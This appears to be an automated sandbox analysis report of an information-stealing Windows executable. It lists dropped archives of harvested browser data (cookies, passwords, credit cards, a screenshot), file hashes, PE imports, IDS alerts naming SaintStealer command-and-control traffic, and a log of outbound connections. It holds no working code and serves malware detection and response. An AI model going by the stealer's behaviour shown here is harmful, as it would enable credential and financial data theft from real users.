                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):890984
                                Entropy (8bit):7.528438168415787
                                Encrypted:false
                                SSDEEP:24576:fV53qeJntUG1huJkE1+aRbRakFLzNwIsz:DaAUuUJkca0Lzaf
                                MD5:91F4A89F04278F41437EDA0A9FE87C25
                                SHA1:96A995037874CC6FDA693711053262EE848F7F23
                                SHA-256:5097DE1D9FB350EDD940A4C9F5D57320DBBD6E36B14BAE6F40BE57F53F96822B
                                SHA-512:B8B55A625FBC54089E80A7C15D93475A8C79C0D34956D4833692CC8EC92CA08BB6FE8F2600A607246FA6524E8314E6C4C8C8B78F4C249098A7B7951CADF41FC1
                                Malicious:false
                                Preview:PK........";.X................Autofill/PK........";.X................Cookies/PK........";.X................CreditCards/PK........";.X................Downloads/PK........";.X................History/PK........";.X................Passwords/PK........";.X...qL..qL......screen1.png.PNG........IHDR................C..L8IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):14970
                                Entropy (8bit):7.837007680406016
                                Encrypted:false
                                SSDEEP:384:yJx9yyyyytjnN8/WpHwbnVCUkWZJx9yyyyytjnN8/WpHwbnVCUkWwPYLNDWhizzU:GyByM2nnV2WPyByM2nnV2WLuR
                                MD5:5F9275C16D8ED763D29E2CC5B75E6B6C
                                SHA1:310D9B1006B17D4EDE2AB8E0749287A7F1F1DCC9
                                SHA-256:1425B5292C8380929470CB0C28A02876724D2201EE1938EFD9CDF891797CE227
                                SHA-512:4322E6CAC1608B4B8DD5A62F909A77E8B17C3618AF630D67A926C06BA72AAE9FC4BF451C3C825328FAC875B04E3EF9AD74B7C0395E221388660A80E89141914B
                                Malicious:false
                                Preview:PK.........;.X.-%U............IVHSHTCODI.pdf.SIv@!......YDq..?H.1!.8.L..h.mb!..daF..}..)...I..i.EP...8.&....d...+..(...;.X.rv\..;&.[gl.u......d'.....r..R0..o...... ....9).$%.....Z..~.^..q..*.C}....k..F..;z...q.\.vUKx6.wi.i.w!y..mw.6..dN..M...q2.Q#Z..^%.0%.XJ2FE..W:.y.;....;....@..-f(.#i1.s.S.n.Q..._SI..o.Z..*.a..3.)0.....Lo.c...-...*.......n;.V..[.../.O....DS.\j..o......0.\..YW....;.e^.U.f..?....(2...-.:.p.T:.....C.;....Ot...0..&..p..,@..wlG.unvS........oh...I.Q=..:fh..0.S..st`NR..b...]..J.D|.[9x...b...I.1..!..`..n...?N.{.m. ...65.}OPz..m..GV..s.8:....LVk..{B.a?.2..}...+.A.+........>.%....J....l..d.......1...u.O....@;L.UQ..w'OS..o...<.o............PK.........;.X1...............JDSOXXXWOA.docx.RGr@!..g&...bE.r...g..k.hG=..p..j.[.G(q.....2.me.T.]g..6..9......v..Zc1\.S.S1[.p.Ex.M.O..N.....A..4.iTP..u...0..4S....|.,.....^.sgv...u,....WF.fj..$<..'`.r\.F0.dN.H ...u7........tQ.f.f..i.p\.'%.y...S.....y.....:p6A.%EH......-./.^.s~..UB..C,.-6.=C9...53.
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):0.017262956703125623
                                Encrypted:false
                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                Malicious:false
                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                Entropy (8bit):6.398426891987362
                                TrID:
                                • Win64 Executable GUI (202006/5) 92.65%
                                • Win64 Executable (generic) (12005/4) 5.51%
                                • Generic Win/DOS Executable (2004/3) 0.92%
                                • DOS Executable Generic (2002/1) 0.92%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:765iYbgWn9.exe
                                File size:5'438'976 bytes
                                MD5:0534ab10184891cd61d262bfd79b7b4c
                                SHA1:a13d37959a92bc37f4d3c42eb53d77cc760f448a
                                SHA256:191272e200345dcb0a7a8c8c975a8b07847f07b9d9f0c3af472fdb88092aee0b
                                SHA512:381af090cc87f2f2b8583c28a164f8f2e978c2bdffe3161d37fa30e38c5e026b90ae5f45dd13f9ded8ee207e4694abf2a58256deb8986ec11d802b7578f6be9d
                                SSDEEP:49152:flhBWdxUM546QwStp9BLoQDbN46Nhz8kGAy9x2XdMP3Z+dlihVnp3qd38gT+c1m0:flXWhqntN46uPM3jwHYlDx7ILqTn
                                TLSH:69467B03FA9545EDC0AAC174875A9333EB32B84A0A24B79B5BD44A313F57F606F9C358
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z..R.f.R.f.R.f.[c..@.f...e.[.f...b._.f...c.z.f..ng.D.f..cg.P.f.R.g.w.f.F.b.H.f.R.f.X.f.F.d.S.f.RichR.f.................PE..d..
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0x1403930f0
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66A3CC60 [Fri Jul 26 16:18:40 2024 UTC]
                                TLS Callbacks:0x4021ee90, 0x1
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:94e6725f9edd6f43dcf6269a222aa3c5
                                Instruction (entry-point bytes, shown decoded as 32-bit x86; in this x86-64 image a leading dec eax is the 0x48 REX.W prefix, so dec eax / sub esp, 28h is sub rsp, 28h, and the registers listed are the 32-bit halves of the 64-bit ones)
                                dec eax
                                sub esp, 28h
                                call 00007FDF45231FCCh
                                dec eax
                                add esp, 28h
                                jmp 00007FDF45231807h
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                nop word ptr [eax+eax+00000000h]
                                dec eax
                                sub esp, 10h
                                dec esp
                                mov dword ptr [esp], edx
                                dec esp
                                mov dword ptr [esp+08h], ebx
                                dec ebp
                                xor ebx, ebx
                                dec esp
                                lea edx, dword ptr [esp+18h]
                                dec esp
                                sub edx, eax
                                dec ebp
                                cmovb edx, ebx
                                dec esp
                                mov ebx, dword ptr [00000010h]
                                dec ebp
                                cmp edx, ebx
                                jnc 00007FDF452319A8h
                                inc cx
                                and edx, 8D4DF000h
                                wait
                                add al, dh
                                Programming Language:
                                • [IMP] VS2008 SP1 build 30729
                                Name                                  Virtual Address  Virtual Size  Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x50bfd4         0x1cc         .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x517000         0x148e0       .pdata
                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x52c000         0x80a4        .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x4ff210         0x54          .rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_TLS             0x4ff400         0x28          .rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x4ff0d0         0x140         .rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_IAT             0x3a6000         0x980         .rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                .text   0x1000           0x3a48e0      0x3a4a00  418d52d22d0626c93475b7ef2f69473f  unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata  0x3a6000         0x168168      0x168200  7d024da4e364f95e765edb693d0e0470  False     0.3832728165133634   data       5.570926269189883   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data   0x50f000         0x70b0        0x6200    254e2bcebbf320ff6f1ad171ec302c16  False     0.4083227040816326   data       4.251782437606779   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .pdata  0x517000         0x148e0       0x14a00   e0382aea4f0e950de6c4ac2410d86fe3  False     0.48731060606060606  data       6.250942251591513   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc  0x52c000         0x80a4        0x8200    d18ff0828687cfa57d6e95da4cab3c38  False     0.26580528846153845  data       5.455481822699318   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                 DLL | Import
                                 api-ms-win-core-synch-l1-2-0.dll | WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                                 bcryptprimitives.dll | ProcessPrng
                                 ntdll.dll | NtDeviceIoControlFile, NtCreateFile, NtWriteFile, RtlNtStatusToDosError, NtCancelIoFileEx, RtlUnwindEx, RtlPcToFileHeader, NtReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
                                 kernel32.dll | MultiByteToWideChar, WriteConsoleW, GetModuleHandleA, GetProcAddress, CreateWaitableTimerExW, SetWaitableTimer, Sleep, QueryPerformanceFrequency, GetModuleHandleW, FormatMessageW, lstrlenW, GetEnvironmentVariableW, GetTempPathW, GetFileInformationByHandleEx, GetFullPathNameW, FlushFileBuffers, SetFilePointerEx, QueryPerformanceCounter, CreateDirectoryW, FindFirstFileW, FindClose, GetConsoleMode, SetFileCompletionNotificationModes, CreateIoCompletionPort, GetQueuedCompletionStatusEx, SetHandleInformation, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, GetCurrentProcess, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetCurrentProcessId, CreateNamedPipeW, CreateThread, ReadFileEx, SleepEx, WriteFileEx, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, HeapAlloc, GetStdHandle, GetCurrentDirectoryW, WaitForSingleObjectEx, AddVectoredExceptionHandler, CreateMutexA, ReleaseMutex, WideCharToMultiByte, DeleteFileW, CopyFileExW, PostQueuedCompletionStatus, GetFinalPathNameByHandleW, SetLastError, GetSystemInfo, UnhandledExceptionFilter, SwitchToThread, SetFileInformationByHandle, GetModuleFileNameW, CreateFileW, SetUnhandledExceptionFilter, HeapReAlloc, GetExitCodeProcess, WaitForSingleObject, GetSystemTimePreciseAsFileTime, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, GetSystemTimeAsFileTime, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, TerminateProcess, IsProcessorFeaturePresent, GetLastError, InitializeSListHead, GetCurrentThread, CloseHandle, IsDebuggerPresent, GetFileInformationByHandle, HeapFree, GetProcessHeap, EncodePointer, RaiseException, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryA, SetThreadStackGuarantee, FindNextFileW, LoadLibraryExW
                                 ws2_32.dll | WSAIoctl, ioctlsocket, socket, getsockname, WSAGetLastError, WSASend, shutdown, getpeername, send, WSACleanup, getsockopt, WSASocketW, closesocket, select, bind, listen, accept, setsockopt, freeaddrinfo, getaddrinfo, recv, connect, WSAStartup
                                 rstrtmgr.dll | RmRegisterResources, RmGetList, RmStartSession
                                 user32.dll | EnumDisplaySettingsExW, EnumDisplayMonitors, GetMonitorInfoW
                                 bcrypt.dll | BCryptGenRandom
                                 advapi32.dll | RegQueryValueExW, CheckTokenMembership, RegOpenKeyExW, AllocateAndInitializeSid, RegCloseKey, SystemFunction036, FreeSid
                                 secur32.dll | FreeCredentialsHandle, DeleteSecurityContext, AcquireCredentialsHandleA, ApplyControlToken, EncryptMessage, DecryptMessage, QueryContextAttributesW, InitializeSecurityContextW, AcceptSecurityContext, FreeContextBuffer
                                 crypt32.dll | CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertFreeCertificateChain, CertGetCertificateChain, CertDuplicateStore, CertOpenStore, CertDuplicateCertificateContext, CertDuplicateCertificateChain, CertCloseStore, CryptUnprotectData
                                 oleaut32.dll | SysAllocStringLen, SafeArrayDestroy, VariantClear, SafeArrayAccessData, SysFreeString, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayUnaccessData
                                 ole32.dll | CoSetProxyBlanket, CoInitializeSecurity, CoInitializeEx, CoCreateInstance
                                 gdi32.dll | GetDeviceCaps, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, DeleteDC, GetDIBits, GetObjectW, DeleteObject, CreateDCW, StretchBlt
                                 api-ms-win-crt-math-l1-1-0.dll | log, ceil, exp2f, _dclass, pow, truncf, __setusermatherr, roundf
                                 api-ms-win-crt-string-l1-1-0.dll | strcspn, strlen, strcmp, strcpy_s, wcsncmp, strncmp
                                 api-ms-win-crt-heap-l1-1-0.dll | free, _msize, realloc, calloc, malloc, _set_new_mode
                                 api-ms-win-crt-utility-l1-1-0.dll | _rotl64, qsort
                                 api-ms-win-crt-time-l1-1-0.dll | _localtime64_s
                                 api-ms-win-crt-runtime-l1-1-0.dll | _configure_narrow_argv, _seh_filter_exe, _endthreadex, _get_initial_narrow_environment, _initterm, _initialize_onexit_table, _beginthreadex, _initterm_e, exit, _exit, terminate, abort, __p___argc, __p___argv, _cexit, _c_exit, _register_onexit_function, _register_thread_local_exe_atexit_callback, _crt_atexit, _initialize_narrow_environment, _set_app_type
                                 api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, _set_fmode
                                 api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
                                 Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                 2024-07-29T07:33:02.984024+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49714 | 40.127.169.103 | 192.168.2.5
                                 2024-07-29T07:32:24.993610+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49705 | 40.127.169.103 | 192.168.2.5
                                 2024-07-29T07:32:56.286114+0200 | TCP | 2039009 | ET MALWARE Win32/SaintStealer CnC Response | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                 Jul 29, 2024 07:32:07.112714052 CEST | 49704 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:07.118252993 CEST | 80 | 49704 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:07.118357897 CEST | 49704 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:07.119781017 CEST | 49704 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:07.124887943 CEST | 80 | 49704 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:07.768171072 CEST | 80 | 49704 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:07.768799067 CEST | 49704 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:07.774341106 CEST | 80 | 49704 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:07.774432898 CEST | 49704 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:42.781970024 CEST | 49712 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:42.787050962 CEST | 80 | 49712 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:42.787149906 CEST | 49712 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:42.787456036 CEST | 49712 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:42.792381048 CEST | 80 | 49712 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:44.409780025 CEST | 80 | 49712 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:44.410648108 CEST | 80 | 49712 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:44.410727024 CEST | 49712 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:44.410871029 CEST | 80 | 49712 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:44.410917044 CEST | 49712 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:44.411043882 CEST | 49712 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:44.412189960 CEST | 80 | 49712 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:44.412257910 CEST | 49712 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:44.649003983 CEST | 80 | 49712 | 195.201.57.90 | 192.168.2.5
                                 Jul 29, 2024 07:32:44.649089098 CEST | 49712 | 80 | 192.168.2.5 | 195.201.57.90
                                 Jul 29, 2024 07:32:54.622900009 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:54.622955084 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:54.623033047 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:54.627111912 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:54.627131939 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.249659061 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.249739885 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.254338026 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.254371881 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.254722118 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.297576904 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.297692060 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.297962904 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298039913 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.298154116 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298239946 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298259974 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.298315048 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.298358917 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298377991 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298465014 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298576117 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.298621893 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.298655987 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298718929 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298755884 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.298923016 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298965931 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.298966885 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.298988104 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.299103022 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299129963 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.299173117 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299196959 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299230099 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299269915 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.299285889 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299375057 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299393892 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.299398899 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299436092 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299485922 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.299510002 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.313872099 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.314014912 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314035892 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.314306974 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314326048 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.314357042 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314393044 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314397097 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.314420938 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314444065 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.314445972 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314477921 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314507961 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314531088 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314558029 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314564943 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.314600945 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314621925 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.314626932 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314651966 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314702034 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314702034 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.314739943 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.319708109 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.319792986 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.319844007 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.319912910 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.319912910 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.330530882 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.330799103 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.330840111 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.330888987 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.330921888 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.330986977 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.331012011 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:55.331068039 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.331108093 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.331129074 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.331163883 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:55.342963934 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:56.285474062 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:56.285650015 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Jul 29, 2024 07:32:56.285887003 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:56.287503958 CEST | 49713 | 443 | 192.168.2.5 | 149.154.167.220
                                 Jul 29, 2024 07:32:56.287544966 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.5
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                 Jul 29, 2024 07:32:07.100429058 CEST | 59075 | 53 | 192.168.2.5 | 1.1.1.1
